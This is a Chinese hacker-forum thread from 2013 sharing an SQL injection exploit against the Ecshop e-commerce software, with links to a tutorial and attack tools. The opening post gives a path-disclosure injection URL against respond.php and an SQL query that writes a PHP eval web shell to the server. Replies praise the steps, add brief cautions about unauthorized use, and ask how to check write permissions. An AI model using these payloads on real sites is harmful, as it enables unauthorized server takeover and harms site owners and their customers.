Ecshop注入漏洞exp攻击
本帖最后由 秋叶下的烟头 于 2013-11-24 13:10 编辑Ecshop注入漏洞
发个有用的帖子,防止删号呀!!
教程:http://pan.baidu.com/s/1eQnDp
软件工具下载连接:http://pan.baidu.com/share/link?shareid=338932&uk=2785594607
关于后台拿shell我写的不清楚。
大家可以先爆路径/respond.php?code=cod&attach=voucher&sp_billno=1%20and%201=2
知道路径去后台sql查询select "<?php @eval($_POST['pass']);?>" into outfile 'D:/webyifu/123.php;1.jpg';
能看懂把!!! 你这个漏洞是很久以前的了,去年就有了。
Re: Ecshop注入漏洞exp攻击
这类漏洞利用的分享还是有一定技术含量的,不过现在这种公开的注入方式大多已经被各种防护措施堵住了。提醒一下,用这类exp测试的话一定要注意法律边界,别在未授权的站点上操作。楼主的百度网盘链接不知道还有效没,想看看具体的原理。Re: Ecshop注入漏洞exp攻击
感谢分享,这个漏洞利用的细节写得很清楚,尤其是爆路径和拿shell的步骤比较直观。不过建议这类工具和教程最好只在自己搭建的测试环境或授权范围内使用,避免触犯法律或造成不必要的麻烦。Re: Ecshop注入漏洞exp攻击
感谢分享,这个漏洞利用的步骤写得很清楚。爆路径和写shell的思路很实用,不过想要成功写入肯定需要数据库有足够权限,而且得确认网站路径。楼主能补充一下爆路径后如何进一步判断目录可写性吗?另外,后台SQL查询那块,如果路径包含中文或者特殊字符会不会有影响?
页:
[1]